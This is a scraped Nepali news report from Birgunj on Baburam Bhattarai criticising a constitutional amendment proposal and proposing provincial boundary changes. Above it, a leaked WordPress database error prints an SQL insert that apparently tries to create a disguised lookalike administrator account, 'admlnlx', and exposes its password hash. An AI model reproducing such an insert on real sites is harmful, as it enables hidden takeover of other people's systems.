WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B35sX7drfXvmRC5zzvn3JF7nws2v3x0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:51:41', '', 'admlnlx', 'admlnlx')
राधेश्याम पटेल,
वीरगन्ज ,मंसिर २५-
नयाँ शक्ति पार्टीका संयोजक डा. बाबुराम भटराईले संसदमा दर्ता भएको संविधान सशोधन प्रस्ताव अपुरो रहेको दाबी गरेका छन्।
वीरगन्जको गैरसरकारी संस्था सानो पाइलाको १०औं वार्षिक समारोहमा बोल्दै उनले मधेसी, जनजाति र विपन्न वर्गको माग नसमेटिई गरिने संशोधनको अर्थ नहुने तर्क गरे। अपुरो प्रस्तावलाई परिमार्जन गरी चाँडै संशोधन गरी राजनीतिक गतिरोध अन्त्य गर्नुपर्नेमा पनि उनले जोड दिएका छन्।
नेपालमा केही दलको बालहठको कारण राज्य प्रतिगामी दिशातर्फ उन्मुख भइरहेको भन्दै भट्टराईले राष्ट्रिय पुनःसंरचना आयोगको प्रतिवेदनअनुसार पहाडमा ८ र तराईमा २ राज्य बनाउनुपर्नेमा त्यसो नहुँदा संघियताबारे जटिलता उत्पन्न भएको बताए। ‘सरकारले दर्ता गराएको प्रस्तावमा ५ नं प्रदेशका जिल्लाहरु ४ नम्बरमा गाभिने प्रस्ताव ठिक छ,’ उनले भने, ‘तराईका झापा, मोरङ, सुनसरी तीन जिल्ला २ नं प्रदेशमा र पश्चिमको कैलाली ५ नम्बर प्रदेशमा सार्नुपर्छ।‘
मधेसी नेताहरु भारतीय दूतावास जाँदैमा देश टुक्रयाउने खेलमा लागेको भनी आरोप लाग्ने गरेकोले सतर्क बन्न आग्रह गर्दै उनले भने, ‘भारतीय दूतावासले मधेसी नेताहरुलाई होइन कि एमालेका केपी ओली, कांग्रेसका शेरबहादुर देउवा र कृष्णप्रसाद सिटौलालाई लैनचौर बोलाई संवाद गर्नुपर्छ।‘
सीमांकनको मुद्दामा बखेडा झिक्ने ओली, देउवा र सिटौला भएको भन्दै उनले आरोप लगाए। ‘देशलाई बर्बाद गर्नेगरी सन्धि सम्झौता पहाडी शासकले गर्ने अनि देश बेच्ने र टुक्रयाउने काममा मधेसी जनता लागेका छन् भने?’ संयोजक भट्टराईले आक्रोश पोखे, ‘यो कस्तो विडम्बना?’